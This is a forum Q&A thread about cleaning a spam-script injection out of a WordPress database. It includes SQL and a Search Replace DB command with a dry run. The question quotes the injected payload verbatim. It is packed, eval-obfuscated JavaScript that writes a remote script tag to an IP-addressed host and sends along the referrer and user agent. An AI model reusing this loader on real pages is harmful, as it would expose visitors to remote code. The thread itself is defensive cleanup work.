# Complex Query using special characters

Tags: database, wordpress

I have a website I am working on that was recently hacked with a SPAM injection. Everything is secured now but I am tasked with cleaning up the remains of a script put on each page. The problem I am facing is that there are special characters used throughout the hack and escaping the special characters is proving to be very challenging.

I am also using a Query builder but even that is getting confused.

The code I am trying to remove is this:

```
<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinsz|var|u0026u|referrer|bhsyf||js|php'.split('|'),0,{}))
```

As you can see once I start escaping characters I start to get lost. I was wondering if anyone has come across this and found an easier way.

I have successfully gone in an manually deleted the code directly in the database but unfortunately there is about 1006 locations and it just takes forever.

Comment: An easier way to do what? What is your question?

Comment: Sorry, it was late when I wrote this. I am looking for a way to find this string in the database. Using it directly (copy/paste) just throws errors or no results because of all the other special characters. As an example I am now trying something like this 

SELECT
  wp_ajkc_posts.post_title,
  wp_ajkc_posts.post_content
FROM wp_ajkc_posts
WHERE wp_ajkc_posts.post_content REGEXP '\<noindex\>.*\W\<\/script\>\<\/noindex\>'

Which still isnt working

Answer (score 1):

Unfortunately, modifying a Wordpress database with direct SQL queries can break PHP serialized strings and objects. So even if you come up with the perfect search term, don't do it that way.

Instead, you might try this awesome [Search Replace DB](https://interconnectit.com/products/search-and-replace-for-wordpress-databases/) tool. Make sure you follow all of their pleas about cautious use of the script, especially: **do a backup first**, use a very cryptic directory name, and remove the folder as soon as you're done.  Also make sure you have php-mbstring running.

The web interface is really nice, but depending on the server setup, it can fail to work. There's also a command line interface, though. To use it, `cd` into the folder that has the tool. There's documentation for the CLI version in the `README.md` file. Here's the basic shape of a command to address your case, which you'll need to test and adjust to match your database setup:

```
php srdb.cli.php --host localhost.or.dbserver --name dbnamehere --user dbuserhere --pass 'dbpasswordhere' --search '/\<noindex\>\<script id\=\"wpinfo\-pst1\".*?<\\/noindex>/s' --replace '' --regex --dry-run
```

I love this tool's `--dry-run` feature, which is set in the code above. After you've done lots of dry-runs and are confident you're doing what you intend to do, remove that option from the command line (or uncheck the "dry-run" box if you're in the web interface) and the replace will actually happen. Then, remember, remove the tool so that no one else can use it.